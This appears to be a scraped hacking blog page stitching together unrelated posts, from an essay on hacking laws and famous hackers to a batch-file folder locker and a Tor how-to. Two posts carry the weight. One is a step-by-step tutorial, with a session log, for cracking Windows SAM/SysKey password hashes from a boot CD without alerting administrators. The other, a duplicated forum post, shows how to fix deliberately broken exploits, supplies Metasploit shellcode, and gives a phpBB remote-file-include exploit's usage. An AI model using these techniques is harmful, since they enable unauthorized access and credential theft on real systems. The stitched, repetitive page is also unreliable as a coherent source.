In general, most governments aren't too crazy about hackers. Hackers' ability to slip in and out of computers undetected, stealing classified information when it amuses them, is enough to give a government official a nightmare. Secret information, or intelligence, is incredibly important. Many government agents won't take the time to differentiate between a curious hacker who wants to test his skills on an advanced security system and a spy.

Laws reflect this attitude. In the United States, there are several laws forbidding the practice of hacking. Some, like 18 U.S.C. § 1029, concentrate on the creation, distribution and use of codes and devices that give hackers unauthorized access to computer systems. The language of the law only specifies using or creating such a device with the intent to defraud, so an accused hacker could argue he just used the devices to learn how security systems worked.



Concern about hackers reaches up to the highest levels of
government. Here, former Attorney General
Janet Reno testifies about hacker activity.

Another important law is 18 U.S.C. § 1030, part of which forbids unauthorized access to government computers. Even if a hacker just wants to get into the system, he or she could be breaking the law and be punished for accessing a nonpublic government computer [Source: U.S. Department of Justice].

Punishments range from hefty fines to jail time. Minor offenses may earn a hacker as little as six months' probation, while other offenses can result in a maximum sentence of 20 years in jail. One formula on the Department of Justice's Web page factors in the financial damage a hacker causes, added to the number of his victims to determine an appropriate punishment [Source: U.S. Department of Justice].

Other countries have similar laws, some much more vague than legislation in the U.S. A recent German law forbids possession of "hacker tools." Critics say that the law is too broad and that many legitimate applications fall under its vague definition of hacker tools. Some point out that under this legislation, companies would be breaking the law if they hired hackers to look for flaws in their security systems [source: IDG News Service].

Hackers can commit crimes in one country while sitting comfortably in front of their computers on the other side of the world. Therefore, prosecuting a hacker is a complicated process. Law enforcement officials have to petition countries to extradite suspects in order to hold a trial, and this process can take years. One famous case is the United States' indictment of hacker Gary McKinnon. Since 2002, McKinnon fought extradition charges to the U.S. for hacking into the Department of Defense and NASA computer systems. McKinnon, who hacked from the United Kingdom, defended himself by claiming that he merely pointed out flaws in important security systems. In April 2007, his battle against extradition came to an end when the British courts denied his appeal [Source: BBC News].

Hacking a Living
Hackers who obey the law can make a good living. Several companies hire hackers to test their security systems for flaws. Hackers can also make their fortunes by creating useful programs and applications, like Stanford University students Larry Page and Sergey Brin. Page and Brin worked together to create a search engine they eventually named Google. Today, they are tied for 26th place on Forbes' list of the world's most wealthy billionaires [source: Forbes].



Famous Hackers


Steve Jobs and Steve Wozniak, founders of Apple Computers, are both hackers. Some of their early exploits even resemble the questionable activities of some malicious hackers. However, both Jobs and Wozniak outgrew their malicious behavior and began concentrating on creating computer hardware and software. Their efforts helped usher in the age of the personal computer -- before Apple, computer systems remained the property of large corporations, too expensive and cumbersome for average consumers.



Steve Jobs, co-founder of
Apple and pioneer hacker


Linus Torvalds, creator of Linux, is another famous honest hacker. His open source operating system is very popular with other hackers. He has helped promote the concept of open source software, showing that when you open information up to everyone, you can reap amazing benefits.

Richard Stallman, also known as "rms," founded the GNU Project, a free operating system. He promotes the concept of free software and computer access. He works with organizations like the Free Software Foundation and opposes policies like Digital Rights Management.

On the other end of the spectrum are the black hats of the hacking world. At the age of 16, Jonathan James became the first juvenile hacker to get sent to prison. He committed computer intrusions on some very high-profile victims, including NASA and a Defense Threat Reduction Agency server. Online, Jonathan used the nickname (called a handle) "c0mrade." Originally sentenced to house arrest, James was sent to prison when he violated parole.



Hacker Kevin Mitnick, newly released from the Federal
Correctional Institution in Lompoc, California.


Kevin Mitnick gained notoriety in the 1980s as a hacker who allegedly broke into the North American Aerospace Defense Command (NORAD) when he was 17 years old. Mitnick's reputation seemed to grow with every retelling of his exploits, eventually leading to the rumor that Mitnick had made the FBI's Most Wanted list. In reality, Mitnick was arrested several times for hacking into secure systems, usually to gain access to powerful computer software.

Kevin Poulsen, or Dark Dante, specialized in hacking phone systems. He's famous for hacking the phones of a radio station called KIIS-FM. Poulsen's hack allowed only calls originating from his house to make it through to the station, allowing him to win in various radio contests. Since then, he has turned over a new leaf, and now he's famous for being a senior editor at Wired magazine.

Adrian Lamo hacked into computer systems using computers at libraries and Internet cafes. He would explore high-profile systems for security flaws, exploit the flaws to hack into the system, and then send a message to the corresponding company, letting them know about the security flaw. Unfortunately for Lamo, he was doing this on his own time rather than as a paid consultant -- his activities were illegal. He also snooped around a lot, reading sensitive information and giving himself access to confidential material. He was caught after breaking into the computer system belonging to the New York Times.

It's likely that there are thousands of hackers active online today, but an accurate count is impossible. Many hackers don't really know what they are doing -- they're just using dangerous tools they don't completely understand. Others know what they're doing so well that they can slip in and out of systems without anyone ever knowing.




AddThis Social Bookmark Button


Protected windows folder

Change Pass to the pass you want.

@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== Pass here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End

go Invisible on Gtalk

see this vedio

http://www.metacafe.com/watch/1083191/invisible_in_gtalk/

-----------------------------

or follow me

1. Download this software

http://sourceforge.net/project/downloading.php?groupname=psi&filename=psi-0.10-win-setup.exe&use_mirror=jaist

2. Go to account setup

3. click add

4. give any name

5. click add

6. in front of jabber id put your GTALK ID

7. password is your GTALK ID password

8. save

9. click on connection tab

10. check on all checkboxes

11. in host put : talk.google.com

12. right click you profile name

13. Right click on profile name

14. click on XML consol

15. check the box of Enable

16. put this in script field

55

17. click on transmit

18. You are Invisble
how it work

see this also if you have problem

http://psi-im.org/wiki/Google_Talk_HowTo_for_Psi_0.9.3




very simle it just a manipulation by XMPP protocol

XMPP work on IM (gtalk)

Password Hasher Firefox Extension


Well seen as though we were talking about breaking passwords, here’s a tool for Firefox to help you manage your more secure passwords.

Better security without bursting your brain

Password Hasher is a Firefox security extension for generating site-specific strong passwords from one (or a few) master key(s).

What good security practice demands:

      Strong passwords that are hard to guess.
      Different passwords at each site.
      Periodically changing existing passwords.

Why you probably aren’t practicing good security:

      Strong passwords are difficult to remember.
      Juggling a multitude of passwords is a pain.
      Updating passwords compounds the memorization problem.

How Password Hasher helps:

  • Strong passwords are automatically generated.
  • The same master key produces different passwords at many sites.
  • You can quickly upgrade passwords by “bumping” the site tag.
  • You can upgrade the master key without updating all sites at once.
  • It supports different length passwords.
  • It supports special requirements, such as digit and punctuation characters.
  • All data is saved to the browser’s secure password database.

You can download Password Hasher here:

passhash-1.0.5.xpi



AddThis Social Bookmark Button


Cracking Syskey and the SAM on Windows XP, 2000 and NT 4


SysKey is an extra level of encryption put on the hashes in the SAM file [1]. SysKey was introduced in Service Pack 3 (SP3) for NT 4 but every version of Windows since has had SysKey enabled by default. The way most folks crack a SAM file on a system that uses SysKey is by running a utility called PWDump as an admin to get the LM (LAN Manager) and NT hashes. The problem is PWdump only works if you can run it from an administrator level account, and if the reason an attacker is cracking the hashes in the first place is to get an administrator level account then PWdump is of little use.

Some folks will ask why would you want to crack the passwords in the SAM at all since it’s far easier to just change the Administrator password using a Linux boot disk or Sala’s Password Renew for PE Builder. The reason an attacker may want to crack the local passwords instead of changing them is two fold:

1. An attacker doesn’t want to tip off the system administrators. If they notice that the old local admin password no longer works they will get a little bit suspicious don’t you think? This is somewhatsolved by Sala’s Password Renew since it lets you add new admin level accounts as well as change existing account’s passwords.

2. The same local account passwords may be used on other systems on the network (and most likely are if they use imaging software like Ghost). If the attacker can crack one machine’s admin password that same password may allow the attacker to gain access to other boxes on that LAN that they only have remote access (across the network) to.

This article assumes that the attacker has only physical access to the machine whose SAM they want to crack and that they also have access to the Knoppix variant known as the Auditor security collection boot CD [5] (I’m using version 120305-01 in this tutorial). Here are the steps you will need to take in order to audit local passwords using the Auditor CD:

Step 1. Download the Auditor Boot CD ISO and burn it to a CD-R. All of the tools we will be using in this tutorial come on the Auditor Boot CD.

Step 2. Insert the Auditor Boot CD into the target system, reboot and set the CD-ROM as the first boot device in the BIOS. Some systems let you hold down a certain function key at startup to choose what media to boot from (on recent Dell’s it’s F12).

Step 3. Auditor will begin to boot and ask you what screen resolution you want to use. Choose a resolution that your monitor and video card will support (I use 2 for 1024x768) then hit enter.

Step 4. When Auditor finishes booting click on the icon on the KDE bar for a new terminal window (it looks like a little monitor). Below you will see the commands you will have to use to get past SysKey, extract the hashes and attempt to crack the password hashes.

Step 5. Mount the local hard disk, most likely hda1:

Linux Command:

mount /dev/hda1



Step 6. Change the present working directory to the ramdisk so we space to work with the files we will be creating:

Linux Command:

cd /ramdisk/


Step 7. Auditor comes with Ncuomo’s Samdump2 and Bkhive [6]. We will be using these tools to extract the system key from the System hive and the password hashes from the SAM file. To get the system key we need to use the Bkhive on our SYSTEM file (most likely in C:\WINDOWS\system32/config\SYSTEM, that’s where it is on my XP Pro test box, on some systems it will me in C:\WINNT\system32/config\SYSTEM or perhaps some other drive entirely). By the way, if for some reason you are running NT4 SP3 you will need to use Bkreg instead, all later system (NT4 SP4, 2000 and XP) use Bkhive. To grab the system key and put it into a file we use the following command:

Linux Command:

bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt


Step 8. Now that we have the system key we can use it to undo SysKey on the SAM, extract the hashes and place them into a PWDump format file:

Linux Command:

samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes.txt


Step 9. At this point we have a PWDump format file called password-hashes.txt that we could copy off of the system and import into L0phtcrack [7] or Cain [8] (see the old tutorial for details). Since I said we were going to do it all with the Auditor CD and Open Source tools we will use John the Ripper to crack the hashes, but before we can use John we have to extract one of the many wordlists that comes with Auditor. Take a look on the CD in /opt/auditor/full/share/wordlists/ for all of the different wordlists you can use, I’ll use english.txt for this tutorial. To extract english.txt to the ramdisk use the following command:

Linux Command:

















gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt




Step 10. Now that everything is in place we can run John with a simple dictionary attack to see if we can crack any of the hashes:

Linux Command:

john password-hashes.txt -w:eng.txt


John detects that the dump file has LM (LAN Manager) hashes in it and chooses the format “NT LM DES [32/32 BS]” automatically. If I had disabled the storing of LM hashes in the SAM I might want to use the –f option to specify the NT hash format and try to crack the NT hashes instead. To do that I would use the following command:

Linux Command:

john password-hashes.txt -f:NT -w:eng.txt


If dictionary attacks aren’t working and you have a lot of time (as well as a fast computer) you can try John’s incremental (brute force) mode and see if it gives you better results:

Linux Command:

john password-hashes.txt -i:all


Incremental mode is limited to only eight characters unless you change the source before you compile it, but at more than eight characters you will likely be waiting a very long time for John to finish. Doing more that eight characters is pointless anyway if you have the LM hashes since there are stored as two seven byte parts (NT hashes are a different story and can be harder to crack).

In case you were wondering what all of these commands would look like along with their output here is a copy of my session log that may help you understand how they all work together (notice that the password for the Administrator account is “monkey”):

Session Log saved from Auditor CD:

root@1[~]# mount /dev/hda1
root@1[~]# cd /ramdisk/
root@1[ramdisk]# bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt
Bkhive ncuomo@studenti.unina.it

Bootkey: 407af4376e55f1fd6d58cc47a4fa4c01
root@1[ramdisk]# samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes
.txt
Samdump2 ncuomo@studenti.unina.it
This product includes cryptographic software written
by Eric Young (eay@cryptsoft.com)

No password for user Guest(501)
No V value!
root@1[ramdisk]# gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt
root@1[ramdisk]# john password-hashes.txt -w:eng.txt
Loaded 3 password hashes with no different salts (NT LM DES [32/32 BS])
MONKEY (Administrator)
guesses: 1 time: 0:00:00:03 100% c/s: 1622943 trying: ZZYZX - ZZZZZZZ
root@1[ramdisk]# john password-hashes.txt -f:NT -w:eng.txt
Loaded 2 password hashes with no different salts (NT MD4 [TridgeMD4])
monkey (Administrator)
guesses: 1 time: 0:00:00:12 100% c/s: 464435 trying: zzzzzzzzzzzzzzzzzzzzzz
root@1[ramdisk]#



Mitigating SAM and SysKey Cracking

There are a few things you can do to make it harder for attacker to crack you local passwords. An attacker will most likely have to get into the BIOs to set it to boot from the CD-ROM. Setting up a BIOs password will help keep crackers from using the Auditor CD (or any boot CD) but if they can get into the computer’s case it’s easy to reset a BIOs password so some sort of physical case lock should be used as well. Strong passwords (non-dictionary words with more that just alphanumeric characters) will also make it harder for attackers to crack passwords since they will have to resort to potentially slow brute force methods.

I hope this short tutorial helps, feel free to write me if you have any questions. Some other techniques you may want to look into for faster cracking are cracking clusters [9] and Rainbow tables [10]. Enjoy your hash. :)



AddThis Social Bookmark Button


Get IP address anonymity everytime

i have found one software which hide your IP address every time and give you a new IP address by creating a Tor Network…….

If u have Mozilla then it works very fine

First Download Vidalia Bundle from here


http://www.torproject.org/download.html.en

Here is link for Windows and MAC OS ……….So download it according to your requirement .

After that to easily turn on and turn off “TOR” .. You can install Firefox add on from here :


https://addons.mozilla.org/en-US/firefox/addon/2275

then restart firefox….After that you will see at right bottom corner that your tor addon for mozilla is installed…now when u want to hide your IP or want to surfing anonymously Turn on or turn off by clicking on this.

You can check your ip address here

http://www.whatismyip.com/

Using exploits. Includes noob protection


ways to handle and compile exploits. Alot of exploits come with "noob protection". Noob protection being they will move or add sections of text or scramble a simple statement so people immediatly know that it shouldnt be that way. This protects against skiddies and noobs from getting and running the exploit. I will show you how to compile exploits with Dev C++ and run perl and php scripts. I will also include the entire remote library from milw0rm compiled in complete.

Downloads: dev c++, perl (win), perl (source), openSSL (win)

WSAStartup
Quote:
[linker error] undefined reference to `WSAStartup@8'
[linker error] undefined reference to `socket@12'

Open dev c++ options

DarkMindZ

in the main window will be a checkbox that says "Add the following commands when calling the compiler" type this in the box -lwsock32

DarkMindZ



press ok and compile again.
----

Using Shellcodes
you can generate shellcodes for metasploits projects with ease. here is one i made for this post




/* win32_exec - EXITFUNC=seh CMD=shutdown -f -s Size=168 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"x31xc9x83xe9xdcxd9xeexd9x74x24xf4x5bx81x73x13xec"
"x94x52x85x83xebxfcxe2xf4x10x7cx16x85xecx94xd9xc0"
"xd0x1fx2ex80x94x95xbdx0exa3x8cxd9xdaxccx95xb9xcc"
"x67xa0xd9x84x02xa5x92x1cx40x10x92xf1xebx55x98x88"
"xedx56xb9x71xd7xc0x76x81x99x71xd9xdaxc8x95xb9xe3"
"x67x98x19x0exb3x88x53x6ex67x88xd9x84x07x1dx0exa1"
"xe8x57x63x45x88x1fx12xb5x69x54x2ax89x67xd4x5ex0e"
"x9cx88xffx0ex84x9cxb9x8cx67x14xe2x85xecx94xd9xed"
"xd0xcbx63x73x8cxc2xdbx7dx6fx54x29xd5x84x64xd8x81"
"xb3xfcxcax7bx66x9ax05x7ax0bxe7x3axf0x98xf0x3dxf2"
"x82xb4x7fxe3xccxb9x21x85";






you can use that code and replace the shellcode in any exploit that uses the shellcode. You can generate new shellcodes here: http://metasploit.com:55555/PAYLOADS First, select the payload you wish to use.

DarkMindZ

then type the command you want it to execute, then press "generate payload"

DarkMindZ


PostPosted: Fri Dec 28, 2007 4:46 pm Reply with quoteBack to top
I will discuss ways to handle and compile exploits. Alot of exploits come with "noob protection". Noob protection being they will move or add sections of text or scramble a simple statement so people immediatly know that it shouldnt be that way. This protects against skiddies and noobs from getting and running the exploit. I will show you how to compile exploits with Dev C++ and run perl and php scripts. I will also include the entire remote library from milw0rm compiled in complete.

Downloads: dev c++, perl (win), perl (source), openSSL (win)

WSAStartup
Quote:
[linker error] undefined reference to `WSAStartup@8'
[linker error] undefined reference to `socket@12'

Open dev c++ options

Image

in the main window will be a checkbox that says "Add the following commands when calling the compiler" type this in the box -lwsock32

Image

press ok and compile again.
----

Using Shellcodes
you can generate shellcodes for metasploits projects with ease. here is one i made for this post
Code:
/* win32_exec - EXITFUNC=seh CMD=shutdown -f -s Size=168 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"x31xc9x83xe9xdcxd9xeexd9x74x24xf4x5bx81x73x13xec"
"x94x52x85x83xebxfcxe2xf4x10x7cx16x85xecx94xd9xc0"
"xd0x1fx2ex80x94x95xbdx0exa3x8cxd9xdaxccx95xb9xcc"
"x67xa0xd9x84x02xa5x92x1cx40x10x92xf1xebx55x98x88"
"xedx56xb9x71xd7xc0x76x81x99x71xd9xdaxc8x95xb9xe3"
"x67x98x19x0exb3x88x53x6ex67x88xd9x84x07x1dx0exa1"
"xe8x57x63x45x88x1fx12xb5x69x54x2ax89x67xd4x5ex0e"
"x9cx88xffx0ex84x9cxb9x8cx67x14xe2x85xecx94xd9xed"
"xd0xcbx63x73x8cxc2xdbx7dx6fx54x29xd5x84x64xd8x81"
"xb3xfcxcax7bx66x9ax05x7ax0bxe7x3axf0x98xf0x3dxf2"
"x82xb4x7fxe3xccxb9x21x85";


you can use that code and replace the shellcode in any exploit that uses the shellcode. You can generate new shellcodes here: http://metasploit.com:55555/PAYLOADS First, select the payload you wish to use.

Image

then type the command you want it to execute, then press "generate payload"

Image

your shellcode should be printed out nicely for you.
- - -

Perl Exploits
If your using windows install this msi package. Lets use an example perl script from milw0rm. http://www.milw0rm.com/exploits/3661

save that exploit to your c: drive as a file called "3661.pl". This exploit justs generates an HTML file exploit, "exploit.html". Its that simple. But some exploits require you to have SSL installed. so you can grab that for windows at the top of this post with the other downloads. Some exploits may require you to pass "arguments" to the application, like this epxloit.

uh oh, noob protection?




syntax error at C:2552.pl line 47, near "print"
Execution of C:2552.pl aborted due to compilation errors.






well instantly i see the end of the line $vul=" is on has no ";" at the end of it. Put that in there so it looks like this




$host=$ARGV[0];
$path=$ARGV[1];
$vul="phpbb_security.php?phpbb_root_path=";





now save it and try again. YAY




C:>2552.pl

################################################## ########################
# #
# phpBB Security <= 1.0.1 Remote File Include Vulnerability #
# Bug found By : Ashiyane Corporation #
# Email: nima salehi nima[at]ashiyane.ir #
# Web Site : www.Ashiyane.ir #
# #
################################################## ########################

Usage: Ashiyane.pl [host] [path]




EX : Ashiyane.pl www.victim.com /path/



AddThis Social Bookmark Button